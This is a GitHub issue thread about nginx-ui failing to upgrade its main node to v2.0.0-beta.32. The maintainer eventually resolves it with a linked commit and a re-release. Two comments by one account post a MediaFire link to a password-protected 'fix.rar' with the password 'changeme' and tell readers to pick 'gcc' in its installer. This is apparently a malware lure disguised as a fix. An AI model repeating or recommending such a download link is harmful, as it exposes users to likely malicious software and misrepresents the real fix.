### ISSUE TITLE
Can't upgrade version on main node (v2.0.0-beta.32)

### ISSUE THREAD

**Issue by ttrinh24** [0xJacky/nginx-ui#527]
**Describe the bug**
Can't upgrade version on main node in dashboard and binary.

**To Reproduce**
- On dashboard:
1. Go to main node 'Local'
2. Click on 'System' menu => 'Upgrade'
3. Click on 'Upgrade' button at [v2.0.0-beta.32](https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.32) . Channel: Stable 
4. Show success but not upgrade
- On binary:
1. Get new release binary [nginx-ui-linux-64.tar.gz](https://github.com/0xJacky/nginx-ui/releases/download/v2.0.0-beta.32/nginx-ui-linux-64.tar.gz)
2. Run with `nginx-ui -config app.ini`
3. Dashboard is still displaying old version.

**Expected behavior**
The new version can upgrade both the main node and the cluster nodes.

**Screenshots**
![image](https://github.com/user-attachments/assets/778b761d-e253-408a-aeee-530be84b41d9)
![image](https://github.com/user-attachments/assets/3083b76d-f2b9-4d85-815d-6fa6ae6a3314)

**Info (please complete the following information):**
 - Server OS: Debian 12.6
 - Server Arch: linux 5.15.0-117-generic x86_64
 - Nginx UI Version: [v2.0.0-beta.31](https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.31)
 - Browser: Chrome

**Additional context**
Only cluster node upgrade new version [v2.0.0-beta.32](https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-beta.32)
![image](https://github.com/user-attachments/assets/1694053b-d8da-47c8-9c72-871f17a25359)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jiriteach** [comment]
Same experience for me. Upgrade succeeds but still shows beta.31

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xJacky** [comment]
Hi @ttrinh24 @jiriteach, this issue has been fixed in https://github.com/0xJacky/nginx-ui/commit/ec312c9f28426732b75329e9ef84a59eacdaef5f, I will release a new verison of v2.0.0-beta.32 later, then you can try to upgrade again.

**Comment by 0xJacky** [comment]
Hi @jiriteach @ttrinh24, you can now upgrade it again, thanks for your report.
